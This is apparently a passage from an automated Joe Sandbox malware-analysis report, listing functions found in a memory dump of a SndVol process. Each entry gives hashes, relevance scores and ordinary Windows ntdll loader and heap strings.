                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $$.mui$.mun$SystemResources\
                                                                                                                                                  • API String ID: 0-3047833772
                                                                                                                                                  • Opcode ID: 15a1443ebbd14e909a26f1bc662f91422a0e11c3b550ff7b7a2ad8fed93191be
                                                                                                                                                  • Instruction ID: 93df521a638f8840ca6a4fc70835004423159e7a3a08d84910a97e33f1674a0d
                                                                                                                                                  • Opcode Fuzzy Hash: 15a1443ebbd14e909a26f1bc662f91422a0e11c3b550ff7b7a2ad8fed93191be
                                                                                                                                                  • Instruction Fuzzy Hash: 9F623976A003299FEB21CF55CC40BD9B7B8BB4B354F4445EAE409A7A50DB319E84CF92
                                                                                                                                                  Function 3659B6C0 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI$\UV6
                                                                                                                                                  • API String ID: 0-4128049041
                                                                                                                                                  • Opcode ID: b16079aaf58e01441af6fce93892e4d1dea35c2b4c6f2079dcd918d509985dff
                                                                                                                                                  • Instruction ID: 91ed080fd4004ead5e18bd5acb982ff5acfed9e64383c91cce5dacf1e9912bca
                                                                                                                                                  • Opcode Fuzzy Hash: b16079aaf58e01441af6fce93892e4d1dea35c2b4c6f2079dcd918d509985dff
                                                                                                                                                  • Instruction Fuzzy Hash: EEB1BC76E25754DBFB15CF66C880B9EB3B6AF94794F244939E850EB280D735E840CB80
                                                                                                                                                  Function 3659B440 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit$\UV6${
                                                                                                                                                  • API String ID: 0-3904934332
                                                                                                                                                  • Opcode ID: 1e0adb26170bd5a5fcf0500e5dd2aa30ae8365704be67902f6af83eb7955b926
                                                                                                                                                  • Instruction ID: a2c97062c5c5077f595a30b25c1269b04ebd0d0e427d788dc079ac3ec50e4f1f
                                                                                                                                                  • Opcode Fuzzy Hash: 1e0adb26170bd5a5fcf0500e5dd2aa30ae8365704be67902f6af83eb7955b926
                                                                                                                                                  • Instruction Fuzzy Hash: A991AAB5E15359CBFB21CF55C840BEE77F0AF11368F6045A9E810AB290D779AA80CF90
                                                                                                                                                  Function 3658F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                                                                                                                                  • API String ID: 2994545307-2586055223
                                                                                                                                                  • Opcode ID: f443bed9bcc4fa50359b610d05f0c402cced0e377dbc70ab1547fb9c094942b7
                                                                                                                                                  • Instruction ID: c1abb0668b7d67f1e8b7e7437c5727c9cb1da0ea87846d6911e6ce928053c95a
                                                                                                                                                  • Opcode Fuzzy Hash: f443bed9bcc4fa50359b610d05f0c402cced0e377dbc70ab1547fb9c094942b7
                                                                                                                                                  • Instruction Fuzzy Hash: CB611172254380AFE712CF65CC44FAAB7E8EF84794F140979E994CB691DB34D801CBA2
                                                                                                                                                  Function 36589148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                                                                                  • API String ID: 2994545307-1391187441
                                                                                                                                                  • Opcode ID: 7ebd53321c97ec75ec17304030724c1cf7b40b2a607c375f630b873043a15803
                                                                                                                                                  • Instruction ID: 284e07fcec5b34c994b0edc660bd73a761b3469e4a1981c1748609ef81961614
                                                                                                                                                  • Opcode Fuzzy Hash: 7ebd53321c97ec75ec17304030724c1cf7b40b2a607c375f630b873043a15803
                                                                                                                                                  • Instruction Fuzzy Hash: 64318136A01218EFDB01CF5ACC84F9AB7BDEF85764F5440B5E814A76A0DB34D940CE61
                                                                                                                                                  Function 365D1270 Relevance: 5.1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$BuildLabEx$E\6$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                                                                  • API String ID: 0-1655721667
                                                                                                                                                  • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                  • Instruction ID: 0e949fa405204555bca2ac6bb0117104770c08ce27a3365d4b249928e859b228
                                                                                                                                                  • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                                                                                                                  • Instruction Fuzzy Hash: 47316D72D00619AFEB11DF99CC40E9EBBB9EB84754F504435EA14A72A0D7709A05CBA1
                                                                                                                                                  Function 365A1F92 Relevance: 4.3, Strings: 3, Instructions: 563COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                  • Opcode ID: 5d71df8608f44499bf474ecbbee03a0b80c737fb9b19ad855fb6d647d687d7a3
                                                                                                                                                  • Instruction ID: 1a99cc9a7503c8ca5722aaf873c9fcbd0cea119b800e40f19707bcbb9b6dffb7
                                                                                                                                                  • Opcode Fuzzy Hash: 5d71df8608f44499bf474ecbbee03a0b80c737fb9b19ad855fb6d647d687d7a3
                                                                                                                                                  • Instruction Fuzzy Hash: 6F2220B4A10346EFEB01CF25C891B6ABBF5FF45748F2484A9E4458F281D772E891CB90
                                                                                                                                                  Function 366394E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: $ $0
                                                                                                                                                  • API String ID: 0-3352262554
                                                                                                                                                  • Opcode ID: e65c629d52ba22361a11f2d4354adf6a70c63d80a19184250359e9dc8e76b45a
                                                                                                                                                  • Instruction ID: 287337968ae2e8167500da2fb819a1002d6db6ddd8aac1f9b9a3652a0215fc33
                                                                                                                                                  • Opcode Fuzzy Hash: e65c629d52ba22361a11f2d4354adf6a70c63d80a19184250359e9dc8e76b45a
                                                                                                                                                  • Instruction Fuzzy Hash: 123217B19093419FE350CF69C880B5BFBE5BB88384F144A2DF599872A0E775D948CF52
                                                                                                                                                  Function 36591460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • HEAP[%wZ]: , xrefs: 36591712
                                                                                                                                                  • HEAP: , xrefs: 36591596
                                                                                                                                                  • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 36591728
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                  • API String ID: 0-3178619729
                                                                                                                                                  • Opcode ID: e70dc6d061a9b934dc3a5f376ab290f02ac380ea0acb7e6cb7f9e70db5dc0900
                                                                                                                                                  • Instruction ID: 289d6c1cb53c31adcc79cc360b1476d38a7d1314dd44d34b96f351aa9e9f1b39
                                                                                                                                                  • Opcode Fuzzy Hash: e70dc6d061a9b934dc3a5f376ab290f02ac380ea0acb7e6cb7f9e70db5dc0900
                                                                                                                                                  • Instruction Fuzzy Hash: E0E1E174A043659FEB25CF29C850ABABBF5AF48348F14886DE496CB245DB34E940CF90
                                                                                                                                                  Function 3661368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                  • API String ID: 0-2391371766
                                                                                                                                                  • Opcode ID: 3e90034f9c6d106fe9803771ae9128386dfc57625dd8519b2db1fd5fe97dd22e
                                                                                                                                                  • Instruction ID: b35296c5ca2ae08e66cb49d59a582c7339777864987f1f76bf7694db24608e82
                                                                                                                                                  • Opcode Fuzzy Hash: 3e90034f9c6d106fe9803771ae9128386dfc57625dd8519b2db1fd5fe97dd22e
                                                                                                                                                  • Instruction Fuzzy Hash: 9EB19EB1A04345BFE711CF65CC80B5BB7E9EB85794F40092AFA42EB290D774E814CB96
                                                                                                                                                  Function 366236EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                  • API String ID: 0-318774311
                                                                                                                                                  • Opcode ID: 9ef548c0ff077a51bf0e9f6fe8caed9162e94e47cc11b9704ef17f05121d2ed0
                                                                                                                                                  • Instruction ID: 562fc01d91dc1c3fa01ba7803559b72c81d1db12e2c5e40bd59a35b43b34839c
                                                                                                                                                  • Opcode Fuzzy Hash: 9ef548c0ff077a51bf0e9f6fe8caed9162e94e47cc11b9704ef17f05121d2ed0
                                                                                                                                                  • Instruction Fuzzy Hash: 01815BB5A08351AFE7118F15C840B6AB7E9EFC5794F400929F990EB390EB74E904CF96
                                                                                                                                                  Function 36617410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                  • API String ID: 0-3870751728
                                                                                                                                                  • Opcode ID: 82c0baf756e62076c1f84d178b62a5b6bbe556cac6b47d0a9c73645798ab8587
                                                                                                                                                  • Instruction ID: 35410b5b048bd5c8ef9f27000e681b43e21f0e9dcc34b4d0dc92fcfa304f5ae7
                                                                                                                                                  • Opcode Fuzzy Hash: 82c0baf756e62076c1f84d178b62a5b6bbe556cac6b47d0a9c73645798ab8587
                                                                                                                                                  • Instruction Fuzzy Hash: C4916DB4E002199FEB14CF69C884B9DBBF1FF48384F24C16AD904AB291EB359841CF95
                                                                                                                                                  Function 365C909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: %$&$@
                                                                                                                                                  • API String ID: 0-1537733988
                                                                                                                                                  • Opcode ID: 0dd5508438d38ce053fd53cb44802bbbaf489d41afbfc348f43de132489f03e0
                                                                                                                                                  • Instruction ID: 86623cf7fbfa5114dac13a5fd9da78700d0bfe4e25c6703ed3a6f3001cfa4830
                                                                                                                                                  • Opcode Fuzzy Hash: 0dd5508438d38ce053fd53cb44802bbbaf489d41afbfc348f43de132489f03e0
                                                                                                                                                  • Instruction Fuzzy Hash: 75718CB4A083419FE704CF64C990A1BBBE9BFC5698F604A2DE4DA97290D730D905CF97
                                                                                                                                                  Function 3666B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • GlobalizationUserSettings, xrefs: 3666B834
                                                                                                                                                  • TargetNtPath, xrefs: 3666B82F
                                                                                                                                                  • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 3666B82A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                  • API String ID: 0-505981995
                                                                                                                                                  • Opcode ID: 6afb78ae6cfea0f8efcfb93336ad838d66ffb1c77fa594062af655ef7983ccc5
                                                                                                                                                  • Instruction ID: 4f11d2b0c15ad1526407a7691ce4f7471e41fadec08fd06507a72aa99fe198f3
                                                                                                                                                  • Opcode Fuzzy Hash: 6afb78ae6cfea0f8efcfb93336ad838d66ffb1c77fa594062af655ef7983ccc5
                                                                                                                                                  • Instruction Fuzzy Hash: 5E618F72D40228EFDB219F55EC88BDAB7B8AB54758F4102E9A508A7250CB749E84CF91
                                                                                                                                                  Function 3658F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • HEAP[%wZ]: , xrefs: 365EE6A6
                                                                                                                                                  • HEAP: , xrefs: 365EE6B3
                                                                                                                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 365EE6C6
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                  • API String ID: 0-1340214556
                                                                                                                                                  • Opcode ID: a4b463940544f64274d152bf11e102bd8bab9be022740655815c4d77c4d219a2
                                                                                                                                                  • Instruction ID: d79e83ae607b4763b432d03245d3c1b43275f9083aeb86bd9c6db4f42fb7a79e
                                                                                                                                                  • Opcode Fuzzy Hash: a4b463940544f64274d152bf11e102bd8bab9be022740655815c4d77c4d219a2
                                                                                                                                                  • Instruction Fuzzy Hash: E251E075B50784EFE712CBA5C884B9ABBF8AF49384F0404B5E580CBA92D734E940CF61
                                                                                                                                                  Function 365B15F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 365FA589
                                                                                                                                                  • minkernel\ntdll\ldrmap.c, xrefs: 365FA59A
                                                                                                                                                  • LdrpCompleteMapModule, xrefs: 365FA590
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                  • API String ID: 0-1676968949
                                                                                                                                                  • Opcode ID: 9b361078395b9198f0b2f5208f15ef3a235529e59710dacc3ed09ebb7e7d6380
                                                                                                                                                  • Instruction ID: 7aa613f06121431a432aa7142bd36251e42daf9bc53b64183814c57a53265c3b
                                                                                                                                                  • Opcode Fuzzy Hash: 9b361078395b9198f0b2f5208f15ef3a235529e59710dacc3ed09ebb7e7d6380
                                                                                                                                                  • Instruction Fuzzy Hash: 6D510374A10745DBFB21CF69CD40B1A7BE4AF40B58F6406B5E9529BAE1DB74E800CB82
                                                                                                                                                  Function 3658758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                  • API String ID: 0-1151232445
                                                                                                                                                  • Opcode ID: 70c3a8db9accbe8e21d4e2f5d732ecb86341c399290bc7c92d84316b691a12b2
                                                                                                                                                  • Instruction ID: 65cc8933c0b4205344d99134b839ecf0f6fc96c77d5a266b2bb671ade102ebcd
                                                                                                                                                  • Opcode Fuzzy Hash: 70c3a8db9accbe8e21d4e2f5d732ecb86341c399290bc7c92d84316b691a12b2
                                                                                                                                                  • Instruction Fuzzy Hash: 574135B8B003A08FFF15CF2AC4847A977E19F41388F6444F9D4558BA52DAB8D886CF51
                                                                                                                                                  Function 365C16CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • LdrpAllocateTls, xrefs: 36601B40
                                                                                                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 36601B39
                                                                                                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 36601B4A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                  • API String ID: 0-4274184382
                                                                                                                                                  • Opcode ID: 1e9383c243e28ecbde160048c6fd5e1b58e0fda964961da49b1aea46a0e73c1c
                                                                                                                                                  • Instruction ID: 628ce7d9b0be6d181c3a9a28b8b65b08869cd242cd518bebc67f9a7e988f3ba0
                                                                                                                                                  • Opcode Fuzzy Hash: 1e9383c243e28ecbde160048c6fd5e1b58e0fda964961da49b1aea46a0e73c1c
                                                                                                                                                  • Instruction Fuzzy Hash: CE4168B5E00619EFDB15CFA9CC40AAEBBF6FF98394F508129E405A7250DB35A811CF91
                                                                                                                                                  Function 36645180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, Offset: 36560000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.0000000036689000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.000000003668D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_36560000_SndVol.jbxd
                                                                                                                                                  Similarity
